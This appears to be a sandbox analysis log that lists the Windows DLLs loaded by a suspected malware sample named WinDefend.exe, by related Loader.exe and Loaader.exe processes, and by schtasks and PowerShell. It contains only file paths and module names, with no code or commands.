Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loader.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: devenum.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Loaader.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe Section loaded: version.dll
